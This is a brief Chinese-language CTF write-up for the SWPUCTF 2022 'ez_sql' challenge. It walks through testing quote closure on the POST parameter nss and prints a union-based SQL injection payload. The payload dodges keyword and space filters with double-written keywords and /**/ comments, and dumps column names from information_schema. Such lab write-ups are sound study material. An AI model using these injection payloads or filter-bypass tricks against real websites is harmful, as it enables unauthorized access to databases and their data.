note-nssctf-01

[SWPUCTF 2022 新生赛]ez_sql

题目说参数为nss，get传nss=1
提示要用更安全的传参法，那就post了
post:

nss=1'  //报错
nss=1'#  //成功闭合

用联合注入发现被过滤了union，空格
双写绕过即可
爆字段payload

nss=' uunionnion/**/select/**/1,database(),group_concat(column_name)from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'#

到这步就差不多了